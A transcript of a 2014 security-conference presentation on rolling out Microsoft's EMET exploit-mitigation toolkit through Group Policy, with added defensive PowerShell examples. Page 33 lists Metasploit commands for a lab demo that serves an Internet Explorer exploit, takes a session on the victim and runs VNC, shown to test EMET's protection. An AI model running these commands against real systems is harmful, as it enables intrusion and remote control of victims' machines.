Download - Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

Transcript
Page 1


Page 2

PRESENTATION Overview

Technical details

Testing

Rolling out in a Corporate Environment

Troubleshooting

Lessons Learned

Tips for Maximum security settings

Demo!

Trademarks owned by their respective owners

Page 3

WHY RUN EMET?
Do you have top-notch anti-malware?

Are your PCs still being exploited?
- No anti-malware product is 100% effective
- Zero-day exploits for IE / Flash / Adobe Reader / Java / etc.

Would you like to improve your odds?

Page 4

SELLING EMET
EMET Software:

Blocks “zero-day” malware exploits

Supplements existing anti-malware

Supported by Microsoft

Uses group policy

Minimal overhead

But wait, there’s more…

It’s FREE!!!

Page 5

OK, WHAT IS EMET?
EMET: Enhanced Mitigation Experience Toolkit

A free software package from Microsoft
- Available since 2009 / officially supported since 2011
- Current version is 4.1 (& 5.0 preview)

Blocks memory corruption / buffer overflow exploits
- Example: it randomizes memory locations

Low overhead: uses the Application Compatibility Framework rather than running as a program
- No need to recompile applications

Install on every workstation

Page 6

WHY RUN EMET? Because Microsoft recommends it:

4/26/2014 - Microsoft KB2963983 IE Vulnerability – “Workarounds […] Deploy the Enhanced Mitigation Experience Toolkit”

3/24/2014 – Microsoft SRD2953095 Word Vulnerability – “our tests showed that EMET default configuration can block the exploits seen in the wild.”

3/11/2014 – Microsoft MS14-012 IE Vulnerability – “Does EMET help mitigate attacks that could attempt to exploit these vulnerabilities? Yes.”

7/28/2010 – Microsoft FF859539 IE Aurora Vulnerability – “EMET can help prevent successful exploitation on systems lacking the update.”

… and it blocks many more for Flash / Adobe Reader / Java / etc…

Page 7

WHERE IT WORKS BEST
Workstations typically get infected in two ways:

1. Workstation has vulnerable software
   - E.g. unpatched/zero-day Adobe, Java, Office, browser plug-ins
   - Users visit an automated exploit web site, or open a bad email document
   -> Install EMET

2. Users get tricked into running bad software
   - Payroll.exe, UPS-Tracking.zip, FakeAV.com
   -> Train users; EMET less effective

* In addition to other mitigations such as anti-malware

Page 8

TECHNICAL: PROTECTION OVERVIEW
Three Types of Protection:

1. System Wide
   - Programs can be coded to opt in or opt out
2. Per-Program
   - Enforces protection on specific programs
3. Per-Web-Site
   - Alerts users to fraudulent SSL/TLS certificates

Page 9

TECHNICAL: 1. SYSTEM-WIDE
1. System-Wide Protections:

DEP - Data Execution Prevention
- Marks data (heap/stack) memory as non-executable
- Requires support by the CPU (Intel=XD, AMD=NX)

SEHOP - Exception Handling
- The OS walks the exception chain to validate it before using it

ASLR - Address Randomization
- Uses different memory locations each boot

Page 10

TECHNICAL: 1. SYSTEM-WIDE
1. System-Wide Protection Options: DEP / SEHOP / ASLR

Always On - All programs will use it
Opt-Out - On, except for programs written to opt out
Opt-In - Off, except for programs written to opt in
Disabled - No programs will use it

Opt-In vs. Opt-Out depends on risk tolerance/resources

Opt-In is the Microsoft recommendation
- Less protection, but fewer compatibility issues
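The four system-wide DEP modes above are what Windows itself reports, so a quick inventory across a test OU tells you where each PC already stands before EMET is rolled out. The script below is an added example (not from the Secure360 deck and not EMET's own tooling); it reads the documented Win32_OperatingSystem properties and maps the numeric policy code (0 = Always Off, 1 = Always On, 2 = Opt-In, 3 = Opt-Out) onto the slide's vocabulary. The function and variable names are my own.

```powershell
# Added example (not part of the deck): report the system-wide DEP policy in the
# slide's terms and flag machines that fall below "at least Opt-In with CPU support".
function Get-SystemDepPolicy {
    [CmdletBinding()]
    param()

    $os = Get-CimInstance -ClassName Win32_OperatingSystem

    # Microsoft's documented encoding of DataExecutionPrevention_SupportPolicy.
    $names = @{
        0 = 'Disabled (Always Off)'
        1 = 'Always On'
        2 = 'Opt-In'
        3 = 'Opt-Out'
    }

    [PSCustomObject]@{
        ComputerName    = $os.CSName
        CpuSupportsDep  = [bool]$os.DataExecutionPrevention_Available        # XD/NX present
        Dep32BitCovered = [bool]$os.DataExecutionPrevention_32BitApplications
        PolicyCode      = [int]$os.DataExecutionPrevention_SupportPolicy
        Policy          = $names[[int]$os.DataExecutionPrevention_SupportPolicy]
    }
}

# True when DEP is hardware-backed and at least Opt-In (the Microsoft baseline on the slide).
function Test-DepBaseline {
    param([Parameter(Mandatory)] $Status)
    if (-not $Status.CpuSupportsDep) { return $false }
    return ($Status.PolicyCode -in 1, 2, 3)
}

$status = Get-SystemDepPolicy
$status | Format-List
if (-not (Test-DepBaseline $status)) {
    Write-Warning "DEP is not active system-wide on $($status.ComputerName)"
}
```

Run it under a remoting session or a startup script and collect the objects centrally; the PolicyCode is also what `bcdedit /set nx <OptIn|OptOut|AlwaysOn|AlwaysOff>` changes, which is the Windows 7 tool the deck points to for reverting system-wide changes before an uninstall.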

Page 11

TECHNICAL: 2. PER-PROGRAM
2. Per-program Protection Options:

Memory Protections:
- DEP / Bottom-Up ASLR / Mandatory ASLR / Heap Spray (blocks common locations) / Null Page

Return Oriented Programming (ROP):
- Load Library checks (no UNC DLL calls) / Memory protection checks (disallow executable stack) / Caller Checks (critical functions only via "call", not "return") / Stack Pivot (detect if the stack was pivoted) / Simulate execution flow (detect ROP gadgets)

Other:
- SEHOP / EAF (Export Address Table Filtering - blocks API address lookup) / ASR (Attack Surface Reduction, in v5.0, blocks specific plugins)

Note: Any protection applied to a browser protects all its plug-ins too

Page 12

TECHNICAL: 3. CERTIFICATE TRUST
3. Per-web-site (v4): Certificate Trust Pinning
- Deters an attacker from using a compromised certificate vendor to intercept traffic (DigiNotar/Google) in IE
- E.g. https://www.facebook.com can only use DigiCert/Equifax/GeoTrust/Thawte/VeriSign certs
- Config: MS / Yahoo / Skype / Twitter / Facebook
- Might require maintenance with non-MS entries
- Can specify expiration date, allow same country, etc.

Only warns users, doesn't block

Not configurable by group policy

Page 13

… CERTIFICATE TRUST

Example:

Certificate Trust Pinning https://www.facebook.com

Certificate Authority must be: DigiCert/Equifax/GeoTrust/ Thawte/VeriSign

(but not, for example, DigiNotar)
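What the two slides above describe is a rule keyed on the root CA vendor behind a site, with an optional expiry and a warn-only outcome. The following is an added illustration of that rule model, not EMET's implementation or its configuration format: the New-PinRule/Test-PinnedChain functions, the rule object shape and the sample chains are all constructed for this example.

```powershell
# Added example, not EMET's code: a model of the Certificate Trust pinning rule
# from the slide. A rule maps a host name to the root CA vendors allowed to issue
# its chain; a mismatch only produces a warning, as the deck notes.
function New-PinRule {
    param(
        [Parameter(Mandatory)] [string]   $Site,
        [Parameter(Mandatory)] [string[]] $AllowedRootCAs,
        [datetime] $Expires = [datetime]::MaxValue   # "Can specify expiration date"
    )
    [PSCustomObject]@{ Site = $Site; AllowedRootCAs = $AllowedRootCAs; Expires = $Expires }
}

# $ChainRootIssuer is the organisation from the chain's root certificate, i.e. the CA
# vendor. The rule pins the vendor, not the leaf certificate, which is why a site can
# renew its certificate without the rule needing maintenance.
function Test-PinnedChain {
    param(
        [Parameter(Mandatory)] $Rule,
        [Parameter(Mandatory)] [string] $Site,
        [Parameter(Mandatory)] [string] $ChainRootIssuer,
        [datetime] $Now = (Get-Date)
    )
    if ($Site -ne $Rule.Site)          { return 'NotCovered'  }   # no rule for this host
    if ($Now -gt $Rule.Expires)        { return 'RuleExpired' }   # rule needs maintenance
    if ($Rule.AllowedRootCAs -contains $ChainRootIssuer) { return 'Trusted' }
    return 'Warn'   # EMET warns the user here; it does not block the page
}

# The slide's example rule for Facebook.
$facebookRule = New-PinRule -Site 'www.facebook.com' `
    -AllowedRootCAs 'DigiCert', 'Equifax', 'GeoTrust', 'Thawte', 'VeriSign'

# Constructed chains: one from an expected vendor, one from a CA not on the list.
Test-PinnedChain -Rule $facebookRule -Site 'www.facebook.com' -ChainRootIssuer 'DigiCert'
Test-PinnedChain -Rule $facebookRule -Site 'www.facebook.com' -ChainRootIssuer 'DigiNotar'
```

The first call returns Trusted and the second Warn. Because the rule is keyed on the CA vendor, any non-Microsoft entries you add must be revisited whenever the site changes vendor, which is the maintenance cost the slide mentions.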

Page 14

TESTING ON A PC

Install Microsoft .Net 4.0 (& KB 2790907 on Win 8/2012)

Download EMET from http://microsoft.com/emet

Install
- It will ask if you want Recommended Settings
- If no configuration is done, EMET doesn't protect

Page 15

…TESTING ON A PC DEMO

Install

Start GUI

Settings
- System-Wide
  - Always On / App Opt-Out / App Opt-In / Disabled
- Per-program
  - v3 / ROP / Mitigation Settings
  - Manually Adding
- Web Certificate CA Pinning

Page 16

…TESTING ON A PC Start up the GUI:

Start Menu -> EMET -> EMET GUI

Sample Test Settings:

DEP: Opt In

SEHOP: Opt In

ASLR: Opt In

Pinning: Enabled

Page 17

…TESTING ON A PC
Import per-Application & Cert Pinning Settings:

Import -> Popular
- Popular has more than Recommended

Import -> CertTrust
- Contains SSL/TLS certificate pinning rules for a few web sites

Page 18

Page 19

Page 20

ROLLING OUT: PREP
Download EMET (& .Net 4)
- http://www.microsoft.com/emet

Extract Group Policy ADM* files
- msiexec /a "EMET Setup.msi" /qb TARGETDIR="c:\temp"
- (or copy from the EMET directory if EMET is already installed)

Install Group Policy ADM* files
- Only needed on machines that will modify group policy
- Copy EMET.admx and EMET.adml from c:\temp\group policy files to \Windows\PolicyDefinitions (admx) and \Windows\PolicyDefinitions\en-US (adml)
- Note: ADM* files differ for each EMET version - use the current ones

Page 21

ROLLING OUT: ACTIVE DIRECTORY

Note: Create a test OU container for each department / drag and drop PC

Page 22

ROLLING OUT: SETTINGS

Note: Create a Group Policy Object, then link to each Test OU container

Page 23

ROLLING OUT: SETTINGS

Note: IE, Popular, and Recommended Software are not similar

Page 24

ROLLING OUT: SETTINGS

Include a shutdown script to apply the group policy: EMET_Conf --refresh

Page 25

ROLLING OUT: SOFTWARE Roll out .Net 4.0 (& KB 2790907 on Win 8/2012)

Roll out EMET using Group Policy or other method

Page 26

TROUBLESHOOTING
EMET notification: Popup Window

OS Application log:
- Office plug-ins also produce an Application Error; search the disk for the module

Page 27

EMET V4 KNOWN ISSUES
Group Policy settings don't display properly in the EMET GUI
- Commands that will display them:
    EMET_Conf --list
    reg query HKLM\Software\Policies\Microsoft\EMET\SysSettings

Certificate Trust Pinning limitations:
- EMET Group Policy doesn't contain those settings
- Not available for the "Modern" IE app in Windows 8

Review the included EMET User's Guide and the EMET web forum for additional caveats

Page 28

LESSONS LEARNED
1. DEP breaks legacy applications
   - Roll out EMET to the enterprise in phases
   - Set system-wide DEP to Opt-In, not Always On
   - E.g. breaks end-of-life versions of Crystal Reports
   - Can individually configure workstations to opt out of DEP for a specific application if you set DEP to Opt-In
     - Computer Properties / Advanced / Performance / DEP
   - Can use the free Microsoft Application Compatibility Toolkit to create a "shim" to roll out for the application to opt out of 32-bit DEP
     - Compatibility Fix setting: "Disable NX"

Page 29

LESSONS LEARNED
2. Apply Group Policy settings before installing
   - Settings didn't always apply afterwards
   - Can get the settings to apply by adding a Group Policy shutdown script to run "EMET_Conf --refresh"
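Both the "ROLLING OUT: SETTINGS" slide and lesson 2 rely on a shutdown script that runs EMET_Conf --refresh, and the v4 known-issues slide says the GUI may not show what Group Policy delivered. The script below is an added example that covers both: it is not from the deck or from Microsoft. The EMET 4.1 install folder is an assumption (check the path for the version you deploy); the registry key is the one the deck's reg query targets, and the log path and variable names are my own.

```powershell
# Added example (not from the deck): Group Policy shutdown/startup script that
# applies EMET policy with "EMET_Conf --refresh" and records what was applied,
# so the state can be verified without trusting the v4 GUI.

# ASSUMPTION: EMET 4.1 default install folder; adjust for other versions.
$emetConf = Join-Path ${env:ProgramFiles(x86)} 'EMET 4.1\EMET_Conf.exe'
if (-not (Test-Path $emetConf)) {
    $emetConf = Join-Path $env:ProgramFiles 'EMET 4.1\EMET_Conf.exe'
}
if (-not (Test-Path $emetConf)) {
    Write-Warning 'EMET_Conf.exe not found; EMET is not installed on this machine yet'
    exit 1
}

# Policy values land here once the GPO has applied (the slide's reg query target).
$policyKey = 'HKLM:\Software\Policies\Microsoft\EMET\SysSettings'
if (-not (Test-Path $policyKey)) {
    Write-Warning "No EMET policy under $policyKey; the GPO has not applied to this machine"
    exit 2
}

# Pull the Group Policy settings into EMET's live configuration.
& $emetConf --refresh | Out-Null
if ($LASTEXITCODE -ne 0) { Write-Warning "EMET_Conf --refresh exited with $LASTEXITCODE" }

# Log the delivered policy and the effective configuration for later review.
$log = Join-Path $env:SystemRoot 'Temp\emet_refresh.log'   # assumed log location
"{0} refresh on {1}" -f (Get-Date -Format s), $env:COMPUTERNAME | Out-File $log -Append
Get-ItemProperty -Path $policyKey | Out-String | Out-File $log -Append
& $emetConf --list 2>&1 | Out-File $log -Append
```

Deploy it under Computer Configuration as a shutdown script (as the deck does) or as a startup script; the exit codes let the script's own event log entry distinguish "EMET not installed" from "GPO not applied", which are the two cases lesson 2 runs into.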

3. Uninstalling EMET doesn't revert system-wide changes (DEP)
   - Revert system-wide changes, then uninstall
   - Tools - Windows 7: bcdedit
   - Possible BitLocker issue with DEP changes

4. IE developers may need EAF disabled for IE; WinZip may need an update for Outlook plug-in compatibility

Page 30

LESSONS LEARNED: THE GOOD POINTS
5. Office/IE issues only when starting/closing the application
   - A non-compatible add-in; a one-user-a-week issue
   - Users claim no impact on them
   - Yes, seriously - I asked twice

6. Fun to get notified if logging workstations centrally
   - Malware tends to give multiple EMET alerts
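Lesson 6 is the detection payoff: an exploit attempt trips several different mitigations on one process within seconds, whereas a compatibility problem (lesson 1) tends to be the same single mitigation firing on the same legacy application day after day. The triage function below is an added example, not part of the deck: the five alert records are constructed, and their message shape ("EMET detected <mitigation> mitigation and will close the application: <exe>") is my assumption about EMET 4.x Application-log events that you should check against your own collected logs before relying on the regex.

```powershell
# Added example (not from the deck): separate probable exploit attempts from
# compatibility noise in centrally collected EMET alerts.

# Constructed sample records. In production, feed in objects from your log
# collector or from Get-WinEvent on each host (MachineName/TimeCreated/Message).
$alerts = @(
    [PSCustomObject]@{ Computer = 'WS-101'; Time = [datetime]'2014-05-13 09:01:10'
                       Message = 'EMET detected EAF mitigation and will close the application: IEXPLORE.EXE' }
    [PSCustomObject]@{ Computer = 'WS-101'; Time = [datetime]'2014-05-13 09:01:12'
                       Message = 'EMET detected StackPivot mitigation and will close the application: IEXPLORE.EXE' }
    [PSCustomObject]@{ Computer = 'WS-101'; Time = [datetime]'2014-05-13 09:01:15'
                       Message = 'EMET detected SimExecFlow mitigation and will close the application: IEXPLORE.EXE' }
    [PSCustomObject]@{ Computer = 'WS-202'; Time = [datetime]'2014-05-13 11:30:00'
                       Message = 'EMET detected DEP mitigation and will close the application: CRW32.EXE' }
    [PSCustomObject]@{ Computer = 'WS-202'; Time = [datetime]'2014-05-14 08:05:00'
                       Message = 'EMET detected DEP mitigation and will close the application: CRW32.EXE' }
)

function Get-EmetAlertSummary {
    param(
        [Parameter(Mandatory)] [object[]] $Alerts,
        [int] $WindowMinutes = 5   # alerts this close together count as one incident
    )
    foreach ($group in ($Alerts | Group-Object Computer)) {
        $sorted = @($group.Group | Sort-Object Time)
        $mitigations = @()
        $processes   = @()
        foreach ($a in $sorted) {
            # ASSUMED message shape; adjust the pattern to the events you actually collect.
            if ($a.Message -match 'EMET detected (?<mit>\S+) mitigation.*:\s*(?<exe>\S+)') {
                $mitigations += $Matches['mit']
                $processes   += $Matches['exe']
            }
        }
        $distinctMit = @($mitigations | Select-Object -Unique).Count
        $spanMinutes = ($sorted[-1].Time - $sorted[0].Time).TotalMinutes
        $burst       = ($sorted.Count -ge 2) -and ($spanMinutes -le $WindowMinutes)

        # Several different ROP/EAF mitigations within minutes on one process: investigate.
        # One mitigation repeating on the same legacy app over days: compatibility (lesson 1).
        if ($burst -and $distinctMit -ge 2)                  { $verdict = 'Investigate: likely exploit attempt' }
        elseif ($distinctMit -eq 1 -and $sorted.Count -ge 2) { $verdict = 'Likely compatibility issue' }
        else                                                 { $verdict = 'Single alert: review' }

        [PSCustomObject]@{
            Computer    = $group.Name
            Alerts      = $sorted.Count
            Mitigations = (@($mitigations | Select-Object -Unique) -join ',')
            Processes   = (@($processes   | Select-Object -Unique) -join ',')
            Verdict     = $verdict
        }
    }
}

Get-EmetAlertSummary -Alerts $alerts | Format-Table -AutoSize
```

With the sample data, WS-101 (three different mitigations on IEXPLORE.EXE within five seconds) is reported as a likely exploit attempt and WS-202 (the same DEP hit on CRW32.EXE a day apart) as a likely compatibility issue. The window and the two-mitigation threshold are tuning knobs; the point is that the same alert stream serves both the detection case on this slide and the compatibility triage on the previous one.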

Page 31

TIPS FOR EXTRA SECURITY
Microsoft's recommendation for Windows 7:
- "Opt-In" for system-wide settings
- "Recommended Software" (IE/Office/Adobe/Java) for per-application settings

A better recommendation:
- Add "Popular Software" for per-application settings
- Adds other applications such as the Firefox and Chrome web browsers
- Big bang for the buck with minimal issues - DO IT!

Maximum settings: not a recommendation with legacy software
- "Opt-Out" for system-wide settings ("Always On" won't allow fixes to work)
- Breaks DEP with 32-bit legacy applications - possibly not worth the extra effort
- Create and deploy "shims" to fix the applications

Page 32

REFERENCES
Microsoft EMET Homepage
- www.microsoft.com/emet
- Download link has the User Guide

EMET Support Forum
- social.technet.microsoft.com/Forums/security/en-US/home?forum=emet

Microsoft Videos
- Tech: technet.microsoft.com/en-us/security/ff859539.aspx
- Non-Tech: http://aka.ms/pjyesw
- EMET 4.1/5.0 TP: http://technet.microsoft.com/en-us/security/jj653751

Page 33

EMET PROTECTION DEMO

Testing EMET using Metasploit w/ Armitage GUI
- Systems:
  - Windows 7
  - Metasploit / Armitage on Kali 1.0 (~BackTrack)
  - Msfupdate, Kali/System/Metasploit/Start, Kali/Exploit/Net/Armitage
- Exploit:
  - (Kali) use exploit/windows/browser/ms11_003_ie_css_import
  - set SRVPORT=80 / set URIPATH=funny
  - exploit -j
  - (Win7) Browse to http://server/funny
  - (Kali/Console) sessions / session -i 1 / run vnc

Page 34

QUESTIONS? Contact:

Chris Covington, CISSP

[email protected]